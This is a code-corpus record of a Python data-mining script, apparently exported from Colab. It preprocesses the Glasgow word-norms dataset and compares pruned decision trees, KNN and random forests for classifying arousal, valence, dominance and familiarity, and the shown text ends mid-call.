| 0.531893
| 477
| 4,813
| 4.763103
| 0.132075
| 0.207746
| 0.197183
| 0.253521
| 0.821743
| 0.809419
| 0.807218
| 0.737676
| 0.737676
| 0.608275
| 0
| 0.030172
| 0.421567
| 4,813
| 96
| 114
| 50.135417
| 0.78592
| 0
| 0
| 0.428571
| 0
| 0
| 0.03469
| 0.02742
| 0
| 0
| 0
| 0
| 0.155844
| 1
| 0.12987
| false
| 0
| 0.038961
| 0
| 0.194805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ab4ea5cc1201ee05f753c0349079707d44fb3d7e
| 102,068
|
py
|
Python
|
Project 1/source code/Classification.py
|
zenith378/Data-Mining
|
424590ab09b2ce7cb83c4a80bc4d9140a646fe76
|
[
"MIT"
] | 1
|
2022-01-05T10:16:35.000Z
|
2022-01-05T10:16:35.000Z
|
Project 1/source code/Classification.py
|
zenith378/Data-Mining
|
424590ab09b2ce7cb83c4a80bc4d9140a646fe76
|
[
"MIT"
] | null | null | null |
Project 1/source code/Classification.py
|
zenith378/Data-Mining
|
424590ab09b2ce7cb83c4a80bc4d9140a646fe76
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Copia di Classification.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/19w462hZ5-StoAmR7fA-GquAcs-hibbSU
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
from matplotlib.ticker import AutoMinorLocator
from matplotlib import gridspec
#scaling, normalization
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler
from sklearn import metrics
from google.colab import files
#caricamento del dataset
df = pd.read_csv('words_glasgow.csv')
#faccio una copia del dataset in caso di manipolazione dati
dfcopy= df.copy()
df2 = df.copy()
df2["perceivability"] = df2[["imageability", "concreteness"]].mean(axis=1)
df_perc=df2.drop(["concreteness","imageability"], axis=1)
dfprepro= df_perc.copy()
dfprepro=dfprepro.rename(columns={"gender": "masculinity"})
dfprepro.loc[(dfprepro['web_corpus_freq'].isnull() == True), 'web_corpus_freq'] = dfprepro['web_corpus_freq'].mean()
dfprepro["web_corpus_log"] = pd.qcut(dfprepro["web_corpus_freq"], 10) #taglio la variabile web_corpus_freq in 10 gruppi
dataframe = [dfprepro]
for dataset in dataframe:
dataset.loc[(dataset["web_corpus_freq"] > 10000) & (dataset["web_corpus_freq"] <= 100000), "web_corpus_freq"] = 4
dataset.loc[(dataset["web_corpus_freq"] > 100000) & (dataset["web_corpus_freq"] <= 1000000), "web_corpus_freq"] = 5
dataset.loc[(dataset["web_corpus_freq"] > 1000000) & (dataset["web_corpus_freq"] <= 10000000), "web_corpus_freq"] = 6
dataset.loc[(dataset["web_corpus_freq"] > 10000000) & (dataset["web_corpus_freq"] <= 100000000), "web_corpus_freq"] = 7
dataset.loc[(dataset["web_corpus_freq"] > 100000000) & (dataset["web_corpus_freq"] <= 1000000000), "web_corpus_freq"] = 8
dataset.loc[dataset["web_corpus_freq"] > 1000000000, "web_corpus_freq"] = 9
dfprepro = dfprepro.drop(["web_corpus_log","word"], axis=1)
"""# Preprocess for classification"""
# per il decision tree
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
# visualizzarlo
from sklearn import tree
import pydotplus
from IPython.display import Image
# evaluazione
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score, f1_score, classification_report
from sklearn.metrics import roc_curve, auc, roc_auc_score
# hyperparameter tuning
from sklearn.model_selection import RandomizedSearchCV, GridSearchCV
# cross-validation
from sklearn.model_selection import cross_val_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import plot_confusion_matrix
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
df_class_ref = dfprepro.copy()
var_to_scale=['aoa',"arousal","valence","dominance","familiarity","semsize","masculinity","perceivability"]
features = df_class_ref[var_to_scale]
scaler = MinMaxScaler().fit(features.values)
features = scaler.transform(features.values)
df_class_ref[var_to_scale] = features
"""#Decision Tree (mostly) and comparison with other methods (binary varaibles only)
### Arousal
"""
refvar="arousal"
taglio=0.55
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt,
filled=True,
rounded=True,
class_names=["not aroused","aroused"],
feature_names=X.columns)
from sklearn.metrics import confusion_matrix
from sklearn.metrics import plot_confusion_matrix
from sklearn.model_selection import cross_val_score
plot_confusion_matrix(clf_dt, X_test, y_test, display_labels=["not aroused","aroused"])
y_pred = clf_dt.predict(X_train)
y_pred = clf_dt.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))
y_score = clf_dt.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=0.003)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
df=pd.DataFrame(data={'tree':range(10), 'accuracy':scores})
df.plot(x='tree', y='accuracy',marker='o',linestyle='--')
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
alpha_results[(alpha_results['alpha']>0.001)
&
(alpha_results['alpha']<0.005)]
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not aroused','aroused'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not aroused","aroused"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
#KNN, find best score
acc = []
# Will take some time
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
#Grid Search
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
param_list = {'max_depth': [None] + [2, 3, 4,5,6,7],
'min_samples_split': [2, 5, 10, 15, 20,30,50,60,70,80,90,100],
'min_samples_leaf': [1, 5, 10, 20,25,30,40,50]
}
grid_search = GridSearchCV(clf_dt, param_grid=param_list, scoring='f1')
grid_search.fit(X, y)
res = grid_search.cv_results_
def report(results, n_top=3):
for i in range(1, n_top + 1):
candidates = np.flatnonzero(results['rank_test_score'] == i)
for candidate in candidates:
print("Model with rank: {0}".format(i))
print("Mean validation score: {0:.3f} (std: {1:.3f})".format(
results['mean_test_score'][candidate],
results['std_test_score'][candidate]))
print("Parameters: {0}".format(results['params'][candidate]))
print("")
report(res, n_top=3)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=40,random_state=42)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_c, tpr_c, th_c = roc_curve(y_test, y_score[:,1])
roc_auc_c = auc(fpr_c, tpr_c)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not aroused","aroused"],
feature_names=X.columns)
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Valence"""
refvar="valence"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plt.figure(figsize=(15,7.5))
clf_dt_pruned.classes_
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=[str(v) for v in clf_dt_pruned.classes_],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not val','val'])
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
#KNN, find best score
acc = []
# Will take some time
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Dominance
"""
refvar="dominance"
taglio=0.57
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=42, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not dominant','dominant'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not dominant","dominant"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
#KNN, find best score
acc = []
# Will take some time
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Familiarity"""
refvar="familiarity"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
